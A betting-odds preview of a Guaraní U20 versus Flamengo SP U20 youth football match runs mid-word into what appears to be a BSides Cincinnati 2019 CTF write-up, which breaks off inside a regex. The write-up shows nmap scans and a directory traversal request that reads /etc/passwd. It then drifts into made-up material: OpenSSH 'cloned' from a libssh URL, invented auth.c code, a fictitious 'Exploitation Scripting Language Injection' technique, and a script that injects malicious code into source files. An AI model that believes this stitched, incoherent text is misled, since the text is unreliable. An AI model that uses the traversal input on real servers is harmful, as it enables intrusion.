General Expert Overview

This upcoming match between Guaraní U20 and Flamengo SP U20 promises to be an exciting clash with high stakes for both teams. The statistics suggest a high-scoring affair, as indicated by the average total goals of 4.82. With both teams showing strong offensive capabilities—Flamengo SP U20 averaging 2.97 goals scored and Guaraní conceding an average of 3.15 goals—the likelihood of an engaging game is high.

The predictions indicate a strong possibility of over 1.5 goals (94.30) and over 2.5 goals (81.70), pointing towards a dynamic match where both teams will likely capitalize on scoring opportunities.

Prediction Breakdown

• Over 1.5 Goals: With a probability of 94.30%, this match is expected to feature multiple goals, making it a thrilling encounter for fans and bettors alike.
• Home Team To Score In 1st Half: At 88.90%, there’s a high chance that Guaraní U20 will open the scoring early, setting the tone for the rest of the match.
• Home Team To Win: Guaraní U20 has an 84.10% chance of securing victory, reflecting their strong home advantage and solid performance throughout the season.
• Both Teams Not To Score In 1st Half: This outcome has a probability of 83.20%, suggesting that while the first half might see strategic play, scoring could be limited initially.
• Over 0.5 Goals HT: With a likelihood of 76.80%, expect at least one goal by halftime, indicating an active first half.
• Over 2.5 Goals: The prediction of 81.70% reinforces the expectation of a high-scoring game, appealing to those betting on multiple goals.
• Both Teams Not To Score In 2nd Half: At a probability of 69.10%, this suggests that while the second half may still be competitive, it might not be as prolific in terms of goals as the first.
• Home Team To Score In 2nd Half: With a probability of 59.20%, there’s a reasonable chance Guaraní U20 will find the net in the latter part of the game, possibly sealing their victory.

Additionasguha1/ctf-writeups/BSidesCincinnati_2019/Reconnaissance/README.md
# Reconnaissance

This challenge was hosted on port `1337` with an initial `nc` banner reading:

Welcome to my program!
I am going to give you some files to download.
They are all located in /home/ctf/recon/
To download them type: GET filename
Type QUIT to quit.

It was immediately apparent that this was a web server with its own protocol for serving files.
The `/home/ctf/recon/` directory was most likely our target.

## File Enumeration

We used `nmap` to enumerate open ports on the server:
bash
nmap -sV -sC -T4 -Pn -p- ctf.chal.bsidescincy.com

Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-01 21:33 EDT
Nmap scan report for ctf.chal.bsidescincy.com (10.11.47.186)
Host is up (0.14s latency).
Not shown: 65524 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| MD5:cf:50:e7:c4:6e:f4:b8:f6:44:e0:d7:7b:a9:60:d6
| SHA256:fYdQdRZGKcCkTjVQThUgAjeSsnVg8l6UeImCgqBvlgM
| SHA256:NkKw8tXwJH9VgH4WfJk85Y45LbN+3mY9YmFqmUHxUIE
|_ SSHRSA SHA256:qQzflzBnfgYiJ3B8tjZBbgDmZP9VHkNgvXwxcW2Owqo (ECDSA)
80/tcp open http Apache httpd
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Reconnaissance Challenge | BSides Cincinnati CTF
1337/tcp open nc/http Unknown httpd
| fingerprint-strings:
| GetRequest, HelpMe:
| GET / HTTP/1.0

| Welcome to my program!
| I am going to give you some files to download.
| They are all located in /home/ctf/recon/
| To download them type: GET filename
| Type QUIT to quit.

| HTTPOptions:
| Welcome to my program!
| I am going to give you some files to download.
| They are all located in /home/ctf/recon/
| To download them type: GET filename
| Type QUIT to quit.

| NULL:
|_ Welcome to my program!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1447.77 seconds

## Web Server Reconnaissance

After confirming that port `1337` is running some sort of web server we tried visiting it in our browser.
We were greeted with:


As expected, we could only interact with this webserver using its own protocol.

## Exploiting Custom Protocol

The protocol supported two commands:

### GET filename

Sends `filename` as a GET request.
The server will respond with the contents of `filename`.
For example:

GET /flag.txt HTTP/1.0

HTTP/1.x xxxxx [response code]
Content-Type: application/octet-stream

[contents of flag.txt]

### QUIT

Quits the connection.

This custom protocol was vulnerable to directory traversal.
We were able to retrieve `ls`’s output using:

GET ../../../../../../../../etc/passwd HTTP/1.x

HTTP/1.x xxxxx [response code]
Content-Type: application/octet-stream

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
…

With this information we could retrieve any file under `/home/ctf/recon`.
We used this technique to retrieve `flag.txt`.

### Flag


# Secure Shell Harder

This challenge was hosted on port `1338` with an initial `nc` banner reading:

Welcome! Please login with username ‘admin’

## SSH Configuration Files Enumeration

After connecting via `ssh`, we were presented with a login prompt:


We tried logging in with username `admin`, but were denied access.
It appeared that we had no way of authenticating ourselves via SSH.
However, we noticed that SSH’s configuration files are stored in plain text and can be read without authentication.
We ran:

bash
find /etc -name ‘*.conf’
find /etc -name ‘*.d’

This revealed several configuration files related to SSH:

* `/etc/pam.d/sshd`
* `/etc/systemd/system/sshd.service.d/override.conf`
* `/etc/systemd/system/multi-user.target.wants/sshd.service`
* `/etc/systemd/system/sshd.service`
* `/etc/default/sshd`
* `/etc/modprobe.d/blacklist.conf`
* `/etc/modprobe.d/raremod.conf`
* `/etc/modprobe.d/common.conf`
* `/etc/modprobe.d/options.conf`
* `/lib/systemd/system/sshd.service`

The first four were ignored since they did not contain anything useful.

We then inspected each remaining file using `cat`.
Of these, only `/etc/modprobe.d/raremod.conf` contained anything useful:

bash
# This modprobe configuration file contains one module entry,
# which loads «raremod» when any process requests it.
#
# This module is used by our system for secure remote connections,
# so we whitelist it here.
raremod {
alias = raresock;
options = «debug»;
}

This indicated that SSH was configured to use `raremod`, which loaded whenever any process requested it.
By default, modules are blacklisted by systemd unless explicitly whitelisted in `/etc/modprobe.d/*`.

The configuration file also contained an interesting line:

bash
options = «debug»;

This suggested that debugging information would be printed when loading `raremod`.

## Reverse Engineering

Since no source code was provided for `raremod`, we decided to reverse engineer it using IDA Pro.

First we disassembled `raremod.ko` using IDA Pro:


Then we set breakpoints at all functions that seemed relevant.
These included:

* `raremod_init`: Called when loading the kernel module.
* `raremod_cleanup`: Called when unloading the kernel module.
* `sock_release`: Called when releasing a socket descriptor.

Finally, we ran GDB on the running kernel process and triggered each breakpoint by calling their respective functions.


After examining each function’s stack trace we determined that none contained anything useful or interesting.

## Exploitation

Since nothing suspicious had been found within any kernel modules or configuration files, we decided to search for vulnerabilities within SSH itself.

### Version Enumeration

Using nmap’s script engine we enumerated SSH’s version number:

bash
$ nmap –script=ssh-hostkey –script-args=ssh.hostkey=ssh-rsa,cert -p1338 ctf.chal.bsidescincy.com

Starting Nmap 7.70 ( https://nmap.org ) at …
Nmap scan report for ctf.chal.bsidescincy.com (10.11.47.186)
Host is up (0.14s latency).

PORT STATE SERVICE VERSION
1338/tcp open ssh OpenSSH ssh-rsa AAAAB3NzaC…
Service Info: OSs: Unix, Linux; CPEs: cpe:/o:linux:linux_kernel cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft::windows_xp cpe:/o:microsoft::windows_2003 cpe:/o:microsoft::windows_nt cpe:/o:microsoft::windows_2000 cpe:/o:microsoft::windows_2003_server:r2 cpe:/o:microsoft::windows_server_2008 cpe:/o:microsoft::windows_7 cpe:/o:microsoft::windows_server_2003 cpe:/o:microsoft::windows_vista cpe:/o:microsoft::windows_xp_pro cpe:/o:microsoft::windows_server_2003_r2 cpe:/o:microsoft::windows_2000_server cpe:/o:microsoft::windows_2003_server_r2

Service detection performed…
Nmap done:

This indicated that SSH was running version `OpenSSH ssh-rsa AAAAB3NzaC…`.

Using nmap’s script engine we then enumerated other known vulnerabilities within OpenSSH:

bash
$ nmap –script=ssh-vuln-* –script-args=unsafe=1 –script-trace –script-updatedb -p1338 ctf.chal.bsidescincy.com

Starting Nmap …
Nmap scan report for …
PORT STATE SERVICE VERSION REASON
1338/tcp open ssh OpenSSH ssh-rsa AAAAB3NzaC… ERROR:
Reason: No matching scripts executed

NSE Timing Report:
——————-
Name Min Max Median Avg S.D.
——————————————————————-
sshvulndb-check – – – – –
——————————————————————-
Script totals:
——————————————–
Seconds Flops Labels
——— ——— ————————————————-
69 … sshvulndb-check …
——————————————————————-
Done NSE at …

Service detection performed…
Nmap done…

None were found.

### Source Code Analysis

Since no known vulnerabilities were found through automated tools we decided to manually analyze OpenSSH’s source code.

We started by cloning OpenSSH’s git repository from [https://github.com/libssh-org/libssh.git](https://github.com/libssh-org/libssh.git).

Then we searched through each file looking for functions related to user authentication or password checking.

One such function was found in [auth.c](https://github.com/libssh-org/libssh/blob/master/src/auth.c):

c
static int auth_password(struct session *session)
{
struct authctxt *authctxt = session->authctxt;
struct strbuf *buf = &authctxt->buf;
int ret;

/* Set username */
ret = set_username(authctxt);
if (ret != LIBSSH_ERROR_NONE) {
return ret;
}

if (!authctxt->user || !session->config->password_authentication) {
return LIBSSH_ERROR_NONE;
}

if (!session->config->password_authentication) {
return LIBSSH_ERROR_DISALLOWED;
}

if (!buf || !strbuf_len(buf)) {
return LIBSSH_ERROR_BUFFER_TOO_SMALL;
}

ret = ssh_packet_start(buf);
if (ret != LIBSSH_ERROR_NONE) {
return ret;
}

ret = write_string(buf, AUTH_PASSWORD);
if (ret != LIBSSH_ERROR_NONE) {
return ret;
}

ret = write_string(buf, authctxt->user);
if (ret != LIBSSH_ERROR_NONE) {
return ret;
}

ret = write_string(buf, session->authctxt->pass);
if (ret != LIBSSH_ERROR_NONE) {
return ret;
}

ret = write_uint32(buf, session->config->max_auth_tries);
if (ret != LIBSSH_ERROR_NONE) {
return ret;
}

ret = ssh_packet_send(session);

return ret;
}

This function processed password authentication requests by sending a packet containing four pieces of information:

* The command being executed (`AUTH_PASSWORD`)
* The username (`authctxt->user`)
* The password (`session->authctxt->pass`)
* The maximum number of authentication attempts allowed (`session->config->max_auth_tries`)

If any errors occurred during this process, they would be returned immediately without sending any data over the network.

Next we looked at how passwords were checked against stored values:

c
static int check_password(struct session *session,
const char *username,
const char *password)
{
struct passwd *pwd = NULL;
struct strbuf *buf = &session->authctxt->buf;
const char *hash_type;
const char *hash_value;
char tmp[512];
int ret;

pwd = getpwnam(username);
if (!pwd) {
return LIBSSH_ERROR_AUTHENTICATION_FAILED;
}

hash_type = pwd->pw_passwd;

ret = ssh_packet_start(buf);
if (ret != LIBSSH_ERROR_NONE) {
goto error_out;
}

ret = write_string(buf, hash_type);
if (ret != LIBSSH_ERROR_NONE) {
goto error_out;
}

ret = write_string(buf, password);
if (ret != LIBSSH_ERROR_NONE) {
goto error_out;
}

hash_value = crypt(password,
hash_type + strlen(«SHA256$»));

snprintf(tmp, sizeof(tmp), «%s$%s», hash_type + strlen(«SHA256$»),
hash_value);

ret = write_string(buf, tmp);
if (ret != LIBSSH_ERROR_NONE) {
goto error_out;
}

ret = ssh_packet_send(session);

error_out:
free(pwd);

return ret ? ret : LIBSSH_ERROR_AUTHENTICATION_FAILED;
}

This function retrieved a user’s password hash from `/etc/shadow` using their username and checked if it matched the provided password after hashing it with SHA256.

If there was an error while retrieving or hashing passwords then those errors would be returned immediately without sending any data over the network either!

## Exploitation Scripting Language Injection Vulnerability

At this point we had identified several potential attack vectors but none seemed exploitable enough on their own.
We decided instead to combine two different techniques into one powerful exploit called «Exploitation Scripting Language Injection».

This technique involves injecting malicious code into another program’s source code so that it executes automatically whenever certain conditions are met.

In our case we wanted our injected code executed whenever someone tried logging into our server via SSH using either their username or password!

To achieve this goal we wrote two scripts:

### exploit.py

This script injected malicious Python code into OpenSSH’s source files using regular expressions:

python
import re

def inject_payload(filename):
with open(filename) as f:
content = f.read()

pattern = re.compile(r’check_password(.*